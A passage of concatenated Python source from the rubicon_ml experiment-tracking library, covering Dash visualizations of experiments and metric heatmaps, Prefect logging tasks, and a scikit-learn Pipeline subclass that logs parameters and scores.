            Available options can be found at
            https://dash.plotly.com/reference#app.run_server. Most commonly,
            the 'port' argument can be provided here to serve the app on a
            specific port.

        Returns
        -------
        IPython.display.IFrame
            The IFrame rendering the served app inline.
        """
        from IPython.display import IFrame

        # avoid a shared mutable `{}` default argument; `serve` normalizes
        # its own kwargs
        i_frame_kwargs = {} if i_frame_kwargs is None else i_frame_kwargs

        host = self.serve(
            in_background=True, dash_kwargs=dash_kwargs, run_server_kwargs=run_server_kwargs
        )
        proxied_host = os.path.join(host, self.app.config["requests_pathname_prefix"].lstrip("/"))

        default_i_frame_kwargs = {
            "height": "600px",
            "width": "100%",
        }
        default_i_frame_kwargs.update(i_frame_kwargs)

        return IFrame(proxied_host, **default_i_frame_kwargs)
import os
import dash_bootstrap_components as dbc
from dash import dash_table, dcc, html
from dash.dependencies import ALL, Input, Output, State
from rubicon_ml import publish
from rubicon_ml.viz.base import VizBase
from rubicon_ml.viz.common.colors import light_blue, plot_background_blue
class ExperimentsTable(VizBase):
    """Visualize the experiments `experiments` and their metadata, metrics,
    and parameters in a tabular format.

    Parameters
    ----------
    experiments : list of rubicon_ml.client.experiment.Experiment, optional
        The experiments to visualize. Defaults to None. Can be set as
        attribute after instantiation.
    is_selectable : bool, optional
        True to enable selection of the rows in the table, False otherwise.
        Defaults to True.
    """

    def __init__(self, experiments=None, is_selectable=True):
        super().__init__(dash_title="experiment table")

        self.experiments = experiments
        self.is_selectable = is_selectable

    @property
    def layout(self):
        """Defines the experiments table's layout."""
        # Bulk-action buttons; disabled entirely when rows are not selectable.
        bulk_select_buttons = [
            html.Div(
                dbc.Button(
                    "select all experiments",
                    color="primary",
                    disabled=not self.is_selectable,
                    id="select-all-button",
                    outline=True,
                ),
                className="bulk-select-button-container",
            ),
            html.Div(
                dbc.Button(
                    "clear all experiments",
                    color="primary",
                    disabled=not self.is_selectable,
                    id="clear-all-button",
                    outline=True,
                ),
                className="bulk-select-button-container",
            ),
            html.Div(
                dbc.Button(
                    "publish selected",
                    color="primary",
                    disabled=not self.is_selectable,
                    id="publish-selected-button",
                    outline=True,
                ),
                className="bulk-select-button-container",
            ),
        ]

        # The main data table: one row per experiment record built by
        # `load_experiment_data`. The first column stays fixed on scroll.
        experiment_table = dash_table.DataTable(
            columns=[
                {"name": column, "id": column, "selectable": self.is_selectable}
                for column in self.all_columns
            ],
            data=self.experiment_records,
            filter_action="native",
            fixed_columns={"headers": True, "data": 1},
            hidden_columns=self.hidden_columns,
            id="experiment-table",
            page_size=10,
            row_selectable="multi" if self.is_selectable else False,
            selected_rows=[],
            sort_action="native",
            sort_mode="multi",
            style_cell={"overflow": "hidden", "textOverflow": "ellipsis"},
            style_data_conditional=[
                {"if": {"row_index": "odd"}, "backgroundColor": plot_background_blue}
            ],
            style_header={"fontWeight": 700},
            style_table={"minWidth": "100%"},
        )

        # Header shows the experiment count, plus a link to the commit on
        # GitHub when every experiment shares a single commit hash.
        header_text = (
            f"showing {len(self.experiments)} experiments "
            f"{'at commit ' if self.commit_hash is not None else ''}"
        )
        header = html.H5(
            [
                html.P(
                    header_text,
                    className="experiment-table-header-text",
                    style={"float": "left"} if self.commit_hash is not None else {},
                ),
                html.A(
                    html.P(
                        [
                            self.commit_hash,
                            html.I(className="bi bi-box-arrow-up-right external-link-icon"),
                        ]
                    ),
                    href=self.github_url,
                    style={"display": "none"} if self.commit_hash is None else {},
                    target="_blank",
                ),
            ],
            className="header-text",
        )

        # Dropdown with one checkbox per column to show/hide table columns,
        # plus "show all"/"hide all" shortcuts.
        toggle_columns_dropdown = dbc.DropdownMenu(
            [
                dbc.DropdownMenuItem(
                    "show all",
                    id="show-all-dropdown-button",
                ),
                dbc.DropdownMenuItem(
                    "hide all",
                    id="hide-all-dropdown-button",
                ),
                dbc.DropdownMenuItem(divider=True),
                *[
                    dbc.DropdownMenuItem(
                        dcc.Checklist(
                            inputClassName="column-dropdown-checkbox",
                            labelClassName="column-dropdown-label",
                            options=[{"label": column, "value": column}],
                            value=[column] if column not in self.hidden_columns else [],
                            id={
                                "type": "column-dropdown-checkbox",
                                "index": column,
                            },
                        ),
                        id={"type": "column-dropdown-button", "index": column},
                    )
                    for column in self.all_columns
                ],
            ],
            color="secondary",
            id="column-selection-dropdown",
            label="toggle columns",
        )

        # Modal prompting for the output path when publishing selected
        # experiments to a catalog YAML file.
        publish_modal = dbc.Modal(
            [
                dbc.ModalHeader(
                    dbc.ModalTitle("publish selected experiments"),
                    close_button=True,
                ),
                dbc.ModalBody(
                    [
                        dbc.Label("enter catalog YAML output path:"),
                        dbc.Input(
                            id="publish-path-input",
                            type="text",
                            value=os.path.join(os.getcwd(), "rubicon-ml-catalog.yml"),
                        ),
                    ],
                ),
                dbc.ModalFooter(dbc.Button("publish", id="publish-button")),
            ],
            id="publish-modal",
            centered=True,
            is_open=False,
            size="lg",
        )

        # The bulk-select buttons only appear when rows are selectable.
        if self.is_selectable:
            header_row = [
                html.Div(
                    header,
                    className="header-row",
                ),
                dbc.Row(
                    [
                        *[dbc.Col(button, width="auto") for button in bulk_select_buttons],
                        dbc.Col(toggle_columns_dropdown),
                    ],
                    className="button-group",
                ),
            ]
        else:
            header_row = [
                dbc.Row(
                    [
                        dbc.Col(
                            html.Div(
                                header,
                                className="header-row",
                            ),
                            width=8,
                        ),
                        dbc.Col(toggle_columns_dropdown),
                    ],
                    className="button-group",
                ),
            ]

        return html.Div(
            [
                *header_row,
                publish_modal,
                dcc.Loading(experiment_table, color=light_blue),
            ],
        )

    def load_experiment_data(self):
        """Load the experiment data required for the experiments table.

        Extracts all experiment metadata as well as parameters and metrics
        from each experiment in `self.experiments`. Sets GitHub information
        if applicable.
        """
        self.experiment_records = []
        self.metric_names = set()
        self.parameter_names = set()
        self.all_columns = ["id", "name", "created_at", "model_name", "commit_hash", "tags"]
        self.hidden_columns = []
        self.commit_hash = None
        self.github_url = None

        commit_hashes = set()
        # "id" and "created_at" are always shown; the other metadata columns
        # are only shown if at least one experiment populates them.
        show_columns = {"id", "created_at"}

        for experiment in self.experiments:
            experiment_record = {
                "id": experiment.id,
                "name": experiment.name,
                "created_at": experiment.created_at,
                "model_name": experiment.model_name,
                "commit_hash": None,
                "tags": ", ".join(str(tag) for tag in experiment.tags),
            }

            if experiment.commit_hash is not None:
                # Display the short (7-character) hash in the table.
                experiment_record["commit_hash"] = experiment.commit_hash[:7]
                commit_hashes.add(experiment.commit_hash)
                show_columns.add("commit_hash")
            if experiment.model_name is not None:
                show_columns.add("model_name")
            if experiment.name is not None:
                show_columns.add("name")
            if len(experiment.tags) > 0:
                show_columns.add("tags")

            # Parameter and metric values are stringified so heterogeneous
            # types render consistently in the table cells.
            for parameter in experiment.parameters():
                experiment_record[parameter.name] = str(parameter.value)
                self.parameter_names.add(parameter.name)
            for metric in experiment.metrics():
                experiment_record[metric.name] = str(metric.value)
                self.metric_names.add(metric.name)

            self.experiment_records.append(experiment_record)

        self.metric_names = list(self.metric_names)
        self.parameter_names = list(self.parameter_names)
        self.all_columns.extend(self.parameter_names + self.metric_names)
        # Metric and parameter columns are never hidden by default; only
        # unpopulated metadata columns are.
        self.hidden_columns = [
            column
            for column in self.all_columns
            if column not in list(show_columns) + self.metric_names + self.parameter_names
        ]

        if len(commit_hashes) == 1:
            # All experiments share one commit: link the header to it.
            # NOTE(review): assumes `project.github_url` is set and ends with
            # ".git" (stripped by `[:-4]`) — confirm before relying on this.
            github_url_root = self.experiments[0].project.github_url[:-4]
            commit_hash = list(commit_hashes)[0]

            self.commit_hash = commit_hash[:7]
            self.github_url = f"{github_url_root}/tree/{commit_hash}"

    def register_callbacks(self, link_experiment_table=False):
        """Register this table's callbacks on the underlying Dash app."""

        @self.app.callback(
            Output({"type": "column-dropdown-checkbox", "index": ALL}, "value"),
            [
                Input("show-all-dropdown-button", "n_clicks_timestamp"),
                Input("hide-all-dropdown-button", "n_clicks_timestamp"),
            ],
            prevent_initial_call=True,
        )
        def update_selected_column_checkboxes(last_show_click, last_hide_click):
            """Bulk updates for the selections in the "toggle columns" dropdown.

            Returns all if triggered by the "show all" button and returns
            only "id" if triggered by the "hide all" button. The initial
            call is prevented as the default state is neither all nor none.
            """
            # Timestamps are None until a button is first clicked; treat
            # "never clicked" as time 0 so the comparison below works.
            last_show_click = last_show_click if last_show_click else 0
            last_hide_click = last_hide_click if last_hide_click else 0

            if last_hide_click > last_show_click:
                # "id" stays visible; every other column's checklist clears.
                hidden_values = [[]] * (len(self.all_columns) - 1)

                return [["id"], *hidden_values]
            return [[column] for column in self.all_columns]

        @self.app.callback(
            Output("experiment-table", "hidden_columns"),
            Input({"type": "column-dropdown-checkbox", "index": ALL}, "value"),
        )
        def update_hidden_experiment_table_cols(selected_columns):
            """Hide and show the columns in the experiment table.

            Returns the columns that should be hidden based on whether or
            not the column's corresponding value is checked in the "toggle
            columns" dropdown.
            """
            selected_columns = [sc[0] for sc in selected_columns if len(sc) > 0]

            return [column for column in self.all_columns if column not in selected_columns]

        @self.app.callback(
            Output("experiment-table", "selected_rows"),
            [
                Input("select-all-button", "n_clicks_timestamp"),
                Input("clear-all-button", "n_clicks_timestamp"),
            ],
            State("experiment-table", "derived_virtual_indices"),
        )
        def update_selected_experiment_table_rows(
            last_select_click, last_clear_click, experiment_table_indices
        ):
            """Bulk selection for the rows of the experiment table.

            Returns all if triggered by the "select all" button and returns
            none if triggered by the "clear all" button.
            """
            if last_select_click is None and last_clear_click is None:
                # Initial call: select every experiment by default.
                return list(range(len(self.experiments)))

            last_select_click = last_select_click if last_select_click else 0
            last_clear_click = last_clear_click if last_clear_click else 0

            if last_select_click > last_clear_click:
                # Select only the rows surviving the current filter/sort.
                return experiment_table_indices
            return []

        @self.app.callback(
            Output("publish-modal", "is_open"),
            [
                Input("publish-selected-button", "n_clicks_timestamp"),
                Input("publish-button", "n_clicks_timestamp"),
            ],
            [
                State("publish-modal", "is_open"),
                State("publish-path-input", "value"),
                State("experiment-table", "derived_virtual_selected_rows"),
                State("experiment-table", "derived_virtual_data"),
            ],
        )
        def toggle_publish_modal(
            last_publish_selected_click,
            last_publish_click,
            is_modal_open,
            publish_path,
            selected_rows,
            data,
        ):
            # Opens the modal when "publish selected" was clicked last;
            # publishes and closes it when the modal's "publish" button
            # was clicked last.
            last_publish_selected_click = (
                last_publish_selected_click if last_publish_selected_click else 0
            )
            last_publish_click = last_publish_click if last_publish_click else 0

            if last_publish_selected_click > last_publish_click:
                return True
            elif last_publish_click > last_publish_selected_click:
                # Map the selected (filtered/sorted) row indices back to
                # experiment IDs, then publish those experiments.
                selected_experiment_ids = [data[row].get("id") for row in selected_rows]
                selected_experiments = [
                    e for e in self.experiments if e.id in selected_experiment_ids
                ]

                publish(selected_experiments, publish_path)

                return False
            return is_modal_open
import copy
import json
import numpy as np
import plotly.figure_factory as ff
from dash import callback_context, dcc, html
from dash.dependencies import ALL, Input, Output
from rubicon_ml.viz.base import VizBase
from rubicon_ml.viz.common import dropdown_header
from rubicon_ml.viz.common.colors import light_blue, plot_background_blue
class MetricListsComparison(VizBase):
    """Visualize lists of metrics logged to the experiments `experiments` as
    an annotated heatmap.

    More info on annotated heatmaps can be found here:
    https://plotly.com/python/annotated-heatmap/

    Parameters
    ----------
    column_names : list of str
        Titles to use for each column in the heatmap. Defaults to None.
    experiments : list of rubicon_ml.client.experiment.Experiment, optional
        The experiments to visualize. Defaults to None. Can be set as
        attribute after instantiation.
    selected_metric : str
        The name of the metric to display at launch. Defaults to None, which
        selects the metric loaded first.
    """

    def __init__(
        self,
        column_names=None,
        experiments=None,
        selected_metric=None,
    ):
        super().__init__(dash_title="compare metric lists")

        self.column_names = column_names
        self.experiments = experiments
        self.selected_metric = selected_metric

    @property
    def layout(self):
        """Defines the layout for the metric lists comparison."""
        return html.Div(
            [
                dropdown_header(
                    list(self.metric_names),
                    self.selected_metric,
                    "comparing metric ",
                    f" over {len(self.experiments)} experiments",
                    "metric",
                ),
                dcc.Loading(
                    html.Div(
                        dcc.Graph(
                            id="metric-heatmap",
                        ),
                        id="metric-heatmap-container",
                    ),
                    color=light_blue,
                ),
            ],
            id="metric-heatmap-layout-container",
        )

    def load_experiment_data(self):
        """Load the experiment data required for the metric lists comparison.

        Extracts all metric metadata from each experiment in `self.experiment`
        if the metric's value is a list.

        Raises
        ------
        ValueError
            If `selected_metric` does not name a list-valued metric on any
            of the experiments.
        """
        self.experiment_records = {}
        self.metric_names = set()

        for experiment in self.experiments:
            for metric in experiment.metrics():
                # Only list-valued metrics can be rendered as heatmap rows.
                if isinstance(metric.value, list):
                    self.metric_names.add(metric.name)

                    experiment_record = self.experiment_records.get(experiment.id, {})
                    experiment_record[metric.name] = metric.value
                    self.experiment_records[experiment.id] = experiment_record

                    # Default to the first list-valued metric encountered.
                    if self.selected_metric is None:
                        self.selected_metric = metric.name

        if self.selected_metric not in self.metric_names:
            raise ValueError(
                f"no metric named `selected_metric` '{self.selected_metric}'"
                " logged to any experiment in `experiments`."
            )

    def register_callbacks(self, link_experiment_table=False):
        outputs = [
            Output("metric-heatmap", "figure"),
            Output("metric-heatmap", "style"),
            Output("metric-header-right-text", "children"),
            Output("metric-dropdown", "label"),
        ]
        inputs = [Input({"type": "metric-dropdown-button", "index": ALL}, "n_clicks")]
        states = []

        if link_experiment_table:
            # When composed with an `ExperimentsTable`, react to its row
            # selection as well.
            inputs.append(
                Input("experiment-table", "derived_virtual_selected_row_ids"),
            )

        @self.app.callback(outputs, inputs, states)
        def update_metric_heatmap(*args):
            """Render the heatmap based on the currently selected metric.

            Returns the Plotly annotated heatmap generated by the values of the
            experiments' selected metric, the heatmap's style, the header text
            with the metric's name, and the selected metric's name.
            """
            if link_experiment_table:
                selected_row_ids = args[-1]
                selected_row_ids = selected_row_ids if selected_row_ids else []
            else:
                selected_row_ids = self.experiment_records.keys()

            # Determine which dropdown button (if any) triggered the
            # callback; otherwise fall back to the current selection.
            property_id = callback_context.triggered[0].get("prop_id")
            property_value = property_id[: property_id.index(".")]

            if not property_value or property_value == "experiment-table":
                selected_metric = self.selected_metric
            else:
                selected_metric = json.loads(property_value).get("index")
                self.selected_metric = selected_metric

            heatmap_data = []
            experiment_ids = []

            for experiment_id, experiment_record in self.experiment_records.items():
                if experiment_id in selected_row_ids:
                    metric_value = experiment_record.get(selected_metric)

                    if metric_value is not None:
                        heatmap_data.append(metric_value)
                        experiment_ids.append(experiment_id[:7])

            header_right_text = (
                f"over {len(experiment_ids)} experiment"
                f"{'s' if len(experiment_ids) != 1 else ''}"
            )

            if len(heatmap_data) == 0:
                return [], {"display": "none"}, header_right_text, selected_metric

            # Min-max scale each column so the color map is comparable
            # across columns with different ranges.
            data_array = np.array(heatmap_data)
            numerator = data_array - data_array.min(axis=0)
            denominator = data_array.max(axis=0) - data_array.min(axis=0)
            denominator[denominator == 0] = 1  # avoid division by zero on constant columns

            scaled_heatmap_data = numerator / denominator

            # Annotate cells with the (rounded) raw values, not the scaled ones.
            annotations = copy.deepcopy(heatmap_data)
            for i, row in enumerate(annotations):
                for j, label in enumerate(row):
                    if isinstance(label, float):
                        annotations[i][j] = round(label, 6)

            heatmap_margin = 30
            heatmap_min_width = 72
            heatmap_cell_width = 6
            heatmap_cell_height = heatmap_cell_width / 2
            heatmap_cell_buffer = 12

            heatmap = ff.create_annotated_heatmap(
                scaled_heatmap_data,
                annotation_text=annotations,
                colorscale="blues",
                hoverinfo="text",
                text=heatmap_data,
                # BUGFIX: `column_names` defaults to None, so guard before
                # calling `len` on it to avoid a TypeError on first render.
                x=(
                    self.column_names
                    if self.column_names is not None
                    and len(self.column_names) == len(heatmap_data[0])
                    else None
                ),
                y=experiment_ids,
            )
            heatmap.update_layout(
                margin_b=heatmap_margin,
                margin_t=heatmap_margin,
                modebar_orientation="v",
                plot_bgcolor=plot_background_blue,
            )
            heatmap.update_xaxes(gridcolor="white")
            heatmap.update_yaxes(gridcolor="white")

            # Size the figure proportionally to the data so cells stay legible.
            heatmap_height = heatmap_cell_buffer + (len(heatmap_data) * heatmap_cell_height)
            heatmap_width = (
                heatmap_cell_buffer + (len(heatmap_data[0]) * heatmap_cell_width)
                if len(heatmap_data[0]) > 8
                else heatmap_min_width
            )
            heatmap_style = {"height": f"{heatmap_height}rem", "width": f"{heatmap_width}rem"}

            return heatmap, heatmap_style, header_right_text, selected_metric
from prefect import task
from rubicon_ml import Rubicon
@task
def get_or_create_project_task(
    persistence, root_dir, project_name, auto_git_enabled=False, storage_options=None, **kwargs
):
    """Get or create a project within a `prefect` flow.

    This `prefect` task can be used within a flow to
    create a new project or get an existing one. It should
    be the entry point to any `prefect` flow that logs
    data to Rubicon.

    Parameters
    ----------
    persistence : str
        The persistence type to be passed to the
        `Rubicon` constructor.
    root_dir : str
        The root directory to be passed to the
        `Rubicon` constructor.
    project_name : str
        The name of the project to get or create.
    auto_git_enabled : bool, optional
        True to use the `git` command to automatically log
        relevant repository information to projects and
        experiments logged with the client instance created
        in this task, False otherwise. Defaults to False.
    storage_options : dict, optional
        Additional keyword arguments specific to the protocol being chosen. They
        are passed directly to the underlying filesystem class. Defaults to
        None (treated as an empty dict).
    kwargs : dict
        Additional keyword arguments to be passed to
        `Rubicon.create_project`.

    Returns
    -------
    rubicon.client.Project
        The project with name `project_name`.
    """
    # `None` default avoids sharing one mutable dict across task invocations.
    storage_options = {} if storage_options is None else storage_options

    rubicon = Rubicon(
        persistence=persistence,
        root_dir=root_dir,
        auto_git_enabled=auto_git_enabled,
        **storage_options,
    )
    project = rubicon.get_or_create_project(project_name, **kwargs)

    return project
@task
def create_experiment_task(project, **kwargs):
    """Log a new experiment to an existing project from a `prefect` flow.

    Parameters
    ----------
    project : rubicon.client.Project
        The project under which the experiment will be created.
    kwargs : dict
        Keyword arguments to be passed to
        `Project.log_experiment`.

    Returns
    -------
    rubicon.client.Experiment
        The created experiment.
    """
    experiment = project.log_experiment(**kwargs)

    return experiment
@task
def log_artifact_task(parent, **kwargs):
    """Log an artifact to a project or experiment from a `prefect` flow.

    Parameters
    ----------
    parent : rubicon.client.Project or rubicon.client.Experiment
        The project or experiment to log the artifact to.
    kwargs : dict
        Keyword arguments to be passed to
        `Project.log_artifact` or `Experiment.log_artifact`.

    Returns
    -------
    rubicon.client.Artifact
        The logged artifact.
    """
    artifact = parent.log_artifact(**kwargs)

    return artifact
@task
def log_dataframe_task(parent, df, **kwargs):
    """Log a dataframe to a project or experiment from a `prefect` flow.

    Parameters
    ----------
    parent : rubicon.client.Project or rubicon.client.Experiment
        The project or experiment to log the dataframe to.
    df : pandas.DataFrame or dask.dataframe.DataFrame
        The `pandas` or `dask` dataframe to log.
    kwargs : dict
        Additional keyword arguments to be passed to
        `Project.log_dataframe` or `Experiment.log_dataframe`.

    Returns
    -------
    rubicon.client.Dataframe
        The logged dataframe.
    """
    logged_dataframe = parent.log_dataframe(df, **kwargs)

    return logged_dataframe
@task
def log_feature_task(experiment, feature_name, **kwargs):
    """Log a feature to an existing experiment from a `prefect` flow.

    Parameters
    ----------
    experiment : rubicon.client.Experiment
        The experiment to log a new feature to.
    feature_name : str
        The name of the feature to log. Passed to
        `Experiment.log_feature` as `name`.
    kwargs : dict
        Additional keyword arguments to be passed to
        `Experiment.log_feature`.

    Returns
    -------
    rubicon.client.Feature
        The logged feature.
    """
    feature = experiment.log_feature(feature_name, **kwargs)

    return feature
@task
def log_metric_task(experiment, metric_name, metric_value, **kwargs):
    """Log a metric to an existing experiment from a `prefect` flow.

    Parameters
    ----------
    experiment : rubicon.client.Experiment
        The experiment to log a new metric to.
    metric_name : str
        The name of the metric to log. Passed to
        `Experiment.log_metric` as `name`.
    metric_value : str
        The value of the metric to log. Passed to
        `Experiment.log_metric` as `value`.
    kwargs : dict
        Additional keyword arguments to be passed to
        `Experiment.log_metric`.

    Returns
    -------
    rubicon.client.Metric
        The logged metric.
    """
    metric = experiment.log_metric(metric_name, metric_value, **kwargs)

    return metric
@task
def log_parameter_task(experiment, parameter_name, parameter_value, **kwargs):
    """Log a parameter to an existing experiment from a `prefect` flow.

    Parameters
    ----------
    experiment : rubicon.client.Experiment
        The experiment to log a new parameter to.
    parameter_name : str
        The name of the parameter to log. Passed to
        `Experiment.log_parameter` as `name`.
    parameter_value : str
        The value of the parameter to log. Passed to
        `Experiment.log_parameter` as `value`.
    kwargs : dict
        Additional keyword arguments to be passed to
        `Experiment.log_parameter`.

    Returns
    -------
    rubicon.client.Parameter
        The logged parameter.
    """
    parameter = experiment.log_parameter(parameter_name, parameter_value, **kwargs)

    return parameter
import warnings
from sklearn.pipeline import Pipeline, _name_estimators
from rubicon_ml.client.project import Project
from rubicon_ml.sklearn.estimator_logger import EstimatorLogger
from rubicon_ml.sklearn.utils import log_parameter_with_warning
class RubiconPipeline(Pipeline):
    """An extension of `sklearn.pipeline.Pipeline` that automatically
    creates a Rubicon `experiment` under the provided `project` and logs
    the pipeline's `parameters` and `metrics` to it.

    A single pipeline run will result in a single `experiment` logged with
    its corresponding `parameters` and `metrics` pulled from the pipeline's
    estimators.

    Parameters
    ----------
    project : rubicon_ml.client.Project
        The rubicon project to log to.
    steps : list
        List of (name, transform) tuples (implementing fit/transform) that
        are chained, in the order in which they are chained, with the last
        object an estimator.
    user_defined_loggers : dict, optional
        A dict mapping the estimator name to a corresponding user defined
        logger. See the example below for more details.
    experiment_kwargs : dict, optional
        Additional keyword arguments to be passed to
        `project.log_experiment()`.
    memory : str or object with the joblib.Memory interface, default=None
        Used to cache the fitted transformers of the pipeline. By default,
        no caching is performed. If a string is given, it is the path to
        the caching directory. Enabling caching triggers a clone of
        the transformers before fitting. Therefore, the transformer
        instance given to the pipeline cannot be inspected
        directly. Use the attribute ``named_steps`` or ``steps`` to
        inspect estimators within the pipeline. Caching the
        transformers is advantageous when fitting is time consuming.
        (docstring source: Scikit-Learn)
    verbose : bool, default=False
        If True, the time elapsed while fitting each step will be printed as
        it is completed. (docstring source: Scikit-Learn)
    ignore_warnings : bool, default=False
        If True, ignores warnings thrown by pipeline.

    Examples
    --------
    >>> pipeline = RubiconPipeline(
    ...     project,
    ...     [
    ...         ("vect", CountVectorizer()),
    ...         ("tfidf", TfidfTransformer()),
    ...         ("clf", SGDClassifier()),
    ...     ],
    ...     user_defined_loggers = {
    ...         "vect": FilterEstimatorLogger(
    ...             select=["input", "decode_error", "max_df"],
    ...         ),
    ...         "tfidf": FilterEstimatorLogger(ignore_all=True),
    ...         "clf": FilterEstimatorLogger(
    ...             ignore=["alpha", "penalty"],
    ...         ),
    ...     }
    ... )
    """

    # NOTE(review): the mutable default arguments below are shared across
    # instances. They are left as-is because scikit-learn's `get_params`/
    # `clone` machinery reads `__init__` signature defaults — confirm any
    # change against sklearn's estimator contract before altering them.
    def __init__(
        self,
        project,
        steps,
        user_defined_loggers={},
        experiment_kwargs={"name": "RubiconPipeline experiment"},
        memory=None,
        verbose=False,
        ignore_warnings=False,
    ):
        self.project = project
        self.user_defined_loggers = user_defined_loggers
        self.experiment_kwargs = experiment_kwargs

        # The experiment currently being logged to; created lazily by
        # `fit`/`score`/`score_samples` when not provided by the caller.
        self.experiment = None
        self.ignore_warnings = ignore_warnings

        super().__init__(steps, memory=memory, verbose=verbose)

    def fit(self, X, y=None, tags=None, log_fit_params=True, experiment=None, **fit_params):
        """Fit the model and automatically log the `fit_params`
        to rubicon-ml. Optionally, pass `tags` to update the experiment's
        tags.

        Parameters
        ----------
        X : iterable
            Training data. Must fulfill input requirements of first step of the pipeline.
        y : iterable, optional
            Training targets. Must fulfill label requirements for all steps of the pipeline.
        tags : list, optional
            Additional tags to add to the experiment during the fit.
        log_fit_params : bool, optional
            True to log the values passed as `fit_params` to this pipeline's experiment.
            Defaults to True.
        fit_params : dict, optional
            Additional keyword arguments to be passed to `sklearn.pipeline.Pipeline.fit()`.
        experiment: rubicon_ml.experiment.client.Experiment, optional
            The experiment to log the to. If no experiment is provided the metrics are
            logged to a new experiment with self.experiment_kwargs.

        Returns
        -------
        rubicon_ml.sklearn.Pipeline
            This `RubiconPipeline`.
        """
        with warnings.catch_warnings():
            # Optionally silence warnings for the duration of the fit + logging.
            if self.ignore_warnings:
                warnings.simplefilter("ignore")

            pipeline = super().fit(X, y, **fit_params)

            if experiment is None:
                experiment = self.project.log_experiment(**self.experiment_kwargs)
            self.experiment = experiment

            if tags is not None:
                self.experiment.add_tags(tags)

            # Log each step's parameters via its (possibly user-defined) logger.
            for step_name, estimator in self.steps:
                logger = self.get_estimator_logger(step_name, estimator)
                logger.log_parameters()

            if log_fit_params:
                for name, value in fit_params.items():
                    log_parameter_with_warning(self.experiment, name, value)

            return pipeline

    def score(self, X, y=None, sample_weight=None, experiment=None):
        """Score with the final estimator and automatically
        log the results to rubicon-ml.

        Parameters
        ----------
        X : iterable
            Data to predict on. Must fulfill input requirements of first step of the pipeline.
        y : iterable, optional
            Targets used for scoring. Must fulfill label requirements for all steps of the pipeline.
        sample_weight : list, optional
            If not None, this argument is passed as sample_weight keyword argument to the
            score method of the final estimator.
        experiment: rubicon_ml.experiment.client.Experiment, optional
            The experiment to log the score to. If no experiment is provided the score is logged
            to a new experiment with self.experiment_kwargs.

        Returns
        -------
        float
            Result of calling `score` on the final estimator.
        """
        with warnings.catch_warnings():
            if self.ignore_warnings:
                warnings.simplefilter("ignore")

            score = super().score(X, y, sample_weight)

            # Prefer the caller's experiment; otherwise reuse the one from
            # `fit`, or lazily create a fresh one.
            if experiment is not None:
                self.experiment = experiment
            elif self.experiment is None:
                self.experiment = self.project.log_experiment(**self.experiment_kwargs)

            logger = self.get_estimator_logger()
            logger.log_metric("score", score)

            # clear `self.experiment` to avoid duplicate metric logging errors
            self.experiment = None

            return score

    def score_samples(self, X, experiment=None):
        """Score samples with the final estimator and automatically
        log the results to rubicon-ml.

        Parameters
        ----------
        X : iterable
            Data to predict on. Must fulfill input requirements of first step of the pipeline.
        experiment: rubicon_ml.experiment.client.Experiment, optional
            The experiment to log the score to. If no experiment is provided the score is logged
            to a new experiment with self.experiment_kwargs.

        Returns
        -------
        ndarray of shape (n_samples,)
            Result of calling `score_samples` on the final estimator.
        """
        with warnings.catch_warnings():
            if self.ignore_warnings:
                warnings.simplefilter("ignore")

            score_samples = super().score_samples(X)

            if experiment is not None:
                self.experiment = experiment
            elif self.experiment is None:
                self.experiment = self.project.log_experiment(**self.experiment_kwargs)

            logger = self.get_estimator_logger()

            # Arrays may not be directly serializable as metric values;
            # retry with a plain list if logging the array fails.
            try:
                logger.log_metric("score_samples", score_samples)
            except TypeError:
                score_samples = score_samples.tolist()
                logger.log_metric("score_samples", score_samples)

            # clear `self.experiment` to avoid duplicate metric logging errors
            self.experiment = None

            return score_samples

    def get_estimator_logger(self, step_name=None, estimator=None):
        """Get a logger for the estimator. By default, the logger will
        have the current experiment set.
        """
        # Fall back to the default logger when no user-defined one exists
        # for this step.
        logger = self.user_defined_loggers.get(step_name) or EstimatorLogger()

        logger.set_experiment(self.experiment)

        if step_name:
            logger.set_step_name(step_name)

        if estimator:
            logger.set_estimator(estimator)

        return logger

    def __getitem__(self, ind):
        """Returns a sub-pipeline with the configured rubicon-ml loggers or
        a single estimator in the pipeline.

        Indexing with an integer will return an estimator; using a slice
        returns another Pipeline instance which copies a slice of this
        Pipeline. This copy is shallow: modifying (or fitting) estimators in
        the sub-pipeline will affect the larger pipeline and vice-versa.
        However, replacing a value in `step` will not affect a copy.
        (docstring source: Scikit-Learn)
        """
        if isinstance(ind, slice):
            if ind.step not in (1, None):
                raise ValueError("Pipeline slicing only supports a step of 1")

            # Carry the matching subset of user-defined loggers into the
            # sliced pipeline.
            user_defined_loggers_slice = self._get_logger_slice(self.steps[ind])

            return self.__class__(
                self.project,
                self.steps[ind],
                user_defined_loggers_slice,
                self.experiment_kwargs,
                memory=self.memory,
                verbose=self.verbose,
            )
        try:
            _, est = self.steps[ind]
        except TypeError:
            # Not an int, try get step by name
            return self.named_steps[ind]
        return est

    def _get_logger_slice(self, steps):
        """Given a slice of estimators, returns the associated slice of loggers."""
        user_defined_loggers_slice = {}

        for name, _ in steps:
            if name in self.user_defined_loggers:
                user_defined_loggers_slice[name] = self.user_defined_loggers[name]

        return user_defined_loggers_slice
def make_pipeline(
    project,
    *steps,
    experiment_kwargs={"name": "RubiconPipeline experiment"},
    memory=None,
    verbose=False
):
    """Wrapper around RubicionPipeline(). Does not require naming for estimators.
    Their names are set to the lowercase strings of their types.

    Parameters
    ----------
    project : rubicon_ml.client.Project
        The rubicon project to log to.
    steps : list
        List of estimator objects or (estimator, logger) tuples (implementing
        fit/transform) that are chained, in the order in which they are chained,
        with the last object an estimator. (docstring source: Scikit-Learn)
    experiment_kwargs : dict, optional
        Additional keyword arguments to be passed to
        `project.log_experiment()`.
    memory : str or object with the joblib.Memory interface, default=None
        Used to cache the fitted transformers of the pipeline. By default,
        no caching is performed. If a string is given, it is the path to
        the caching directory. Enabling caching triggers a clone of
        the transformers before fitting. Therefore, the transformer
        instance given to the pipeline cannot be inspected
        directly. Use the attribute ``named_steps`` or ``steps`` to
        inspect estimators within the pipeline. Caching the
        transformers is advantageous when fitting is time consuming.
        (docstring source: Scikit-Learn)
    verbose : bool, default=False
        If True, the time elapsed while fitting each step will be printed as it
        is completed. (docstring source: Scikit-Learn)

    Returns
    -------
    rubicon_ml.sklearn.Pipeline
        A `RubiconPipeline` with project `project` and steps `steps`.

    Raises
    ------
    ValueError
        If `project` is not a `rubicon_ml.client.Project`.
    """
    # Fail fast on an invalid project before doing any work on the steps.
    # (Also fixes the original message, which was missing a space after
    # "project".)
    if not isinstance(project, Project):
        raise ValueError(
            f"project {project} must be of type rubicon_ml.client.project.Project"
        )

    steps, loggers = _split_steps_loggers(steps)

    steps = _name_estimators(steps)
